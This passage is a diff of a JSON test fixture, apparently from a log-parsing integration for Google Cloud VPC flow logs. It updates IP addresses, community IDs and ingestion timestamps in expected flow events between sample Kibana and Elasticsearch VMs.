"{\"insertId\":\"y4wffpfk2erob\",\"jsonPayload\":{\"bytes_sent\":\"13455\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33880},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821047175Z\",\"packets_sent\":\"81\",\"reporter\":\"DEST\",\"rtt_msec\":\"252\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470071135Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470071135Z", "end": "2019-06-14T03:49:51.821047175Z", @@ -9442,9 +9442,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 57300, - "ip": "203.0.113.12" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -9458,7 +9458,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:h/SRCB44wNMtbU2v3aeGitgKFRo=", + "community_id": "1:Xvu/n5tUKDHRNKc/db6OBLZgf9A=", "bytes": 1780, "transport": "tcp", "type": "ipv4", @@ -9473,7 +9473,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.12" + "67.43.156.13" ] }, "gcp": { 
@@ -9497,8 +9497,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868762100Z", - "original": "{\"insertId\":\"y4wffpfk2erox\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"203.0.113.12\",\"dest_port\":57300,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:22.156322353Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:22.044604322Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391674600Z", + "original": 
"{\"insertId\":\"y4wffpfk2erox\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":57300,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:22.156322353Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:22.044604322Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:48:22.044604322Z", "end": "2019-06-14T03:48:22.156322353Z", @@ -9527,17 +9527,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65315, "bytes": 71014, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 728 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:EHEo9aOjBBeD5qcMBbJM+L2kBW8=", + "community_id": "1:Q4aMH1aaXCHezhMNJFHYthlXz1Y=", "bytes": 71014, "transport": "tcp", "type": "ipv4", @@ -9551,7 +9551,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -9576,8 +9576,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868765300Z", - "original": "{\"insertId\":\"y4wffpfk2eroc\",\"jsonPayload\":{\"bytes_sent\":\"71014\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65315},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220720811Z\",\"packets_sent\":\"728\",\"reporter\":\"DEST\",\"rtt_msec\":\"210\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.844068405Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391680200Z", + "original": 
"{\"insertId\":\"y4wffpfk2eroc\",\"jsonPayload\":{\"bytes_sent\":\"71014\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65315},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220720811Z\",\"packets_sent\":\"728\",\"reporter\":\"DEST\",\"rtt_msec\":\"210\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.844068405Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.844068405Z", "end": "2019-06-14T03:49:56.220720811Z", @@ -9598,10 +9598,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -9615,7 +9615,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:VqjLGbDeItVznngxat3pnPeGkec=", + "community_id": "1:Z4JXA8xt+j3ewQW8WvNJAPaHMoA=", "bytes": 60749, "name": "default", "transport": "tcp", @@ -9638,7 +9638,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -9674,8 +9674,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868768300Z", - "original": "{\"insertId\":\"y4wffpfk2erok\",\"jsonPayload\":{\"bytes_sent\":\"60749\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33538},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"362\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391685700Z", + "original": 
"{\"insertId\":\"y4wffpfk2erok\",\"jsonPayload\":{\"bytes_sent\":\"60749\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33538},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"362\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500483335Z", "end": "2019-06-14T03:49:59.565287007Z", @@ -9696,10 +9696,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33880, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -9713,7 +9713,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Kk7/PaNTTm0JkSjavpifN6V8b2s=", + "community_id": "1:p34w66dg33j2mO1tBhizc/ISlFM=", "bytes": 160451, "name": "default", "transport": "tcp", @@ -9736,7 +9736,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -9772,8 +9772,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868771500Z", - "original": "{\"insertId\":\"y4wffpfk2eros\",\"jsonPayload\":{\"bytes_sent\":\"160451\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33880,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821138391Z\",\"packets_sent\":\"66\",\"reporter\":\"SRC\",\"rtt_msec\":\"252\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470071135Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391691100Z", + "original": 
"{\"insertId\":\"y4wffpfk2eros\",\"jsonPayload\":{\"bytes_sent\":\"160451\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33880,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821138391Z\",\"packets_sent\":\"66\",\"reporter\":\"SRC\",\"rtt_msec\":\"252\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470071135Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470071135Z", "end": "2019-06-14T03:49:51.821138391Z", @@ -9800,18 +9800,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 169173, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 64 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:UPRJyBawh4JbZzzvBFfenzP0Yco=", + "community_id": "1:yy2U6IJ6o+0ezyD0HfX5dcSPTyA=", "bytes": 169173, "name": "default", "transport": "tcp", @@ -9833,7 +9833,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -9870,8 +9870,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868784300Z", - "original": "{\"insertId\":\"y4wffpfk2erod\",\"jsonPayload\":{\"bytes_sent\":\"169173\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33574,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"64\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466811088Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391696900Z", + "original": 
"{\"insertId\":\"y4wffpfk2erod\",\"jsonPayload\":{\"bytes_sent\":\"169173\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33574,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"64\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466811088Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466811088Z", "end": "2019-06-14T03:49:51.821291282Z", @@ -9894,9 +9894,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65315, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -9910,7 +9910,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:EHEo9aOjBBeD5qcMBbJM+L2kBW8=", + "community_id": "1:Q4aMH1aaXCHezhMNJFHYthlXz1Y=", "bytes": 118762, "transport": "tcp", "type": "ipv4", @@ -9925,7 +9925,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { 
@@ -9949,8 +9949,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868789Z", - "original": "{\"insertId\":\"y4wffpfk2ero6\",\"jsonPayload\":{\"bytes_sent\":\"118762\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65315,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220720811Z\",\"packets_sent\":\"615\",\"reporter\":\"SRC\",\"rtt_msec\":\"210\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.844068405Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391701100Z", + "original": 
"{\"insertId\":\"y4wffpfk2ero6\",\"jsonPayload\":{\"bytes_sent\":\"118762\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65315,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220720811Z\",\"packets_sent\":\"615\",\"reporter\":\"SRC\",\"rtt_msec\":\"210\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.844068405Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.844068405Z", "end": "2019-06-14T03:49:56.220720811Z", @@ -9971,10 +9971,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -9988,7 +9988,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:8dEsdSCqyZDg8ZlrEARjkF61tVk=", + "community_id": "1:8HPuUT0Nn+eIY1y5PdvmF0aw60A=", "bytes": 11137, "name": "default", "transport": "tcp", @@ -10011,7 +10011,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -10047,8 +10047,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868792700Z", - "original": "{\"insertId\":\"y4wffpfk2eron\",\"jsonPayload\":{\"bytes_sent\":\"11137\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33576},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"96\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510464198Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391705500Z", + "original": 
"{\"insertId\":\"y4wffpfk2eron\",\"jsonPayload\":{\"bytes_sent\":\"11137\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33576},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"96\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510464198Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510464198Z", "end": "2019-06-14T03:49:51.821302149Z", @@ -10075,17 +10075,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 57300, "bytes": 1458, - "ip": "203.0.113.12", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:h/SRCB44wNMtbU2v3aeGitgKFRo=", + "community_id": "1:Xvu/n5tUKDHRNKc/db6OBLZgf9A=", "bytes": 1458, "transport": "tcp", "type": "ipv4", @@ -10099,7 +10099,7 @@ }, "related": { "ip": [ - "203.0.113.12", + "67.43.156.13", "10.87.40.76" ] }, 
@@ -10124,8 +10124,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868795900Z", - "original": "{\"insertId\":\"y4wffpfk2eroy\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.12\",\"src_port\":57300},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:22.156322353Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:22.044604322Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391710600Z", + "original": 
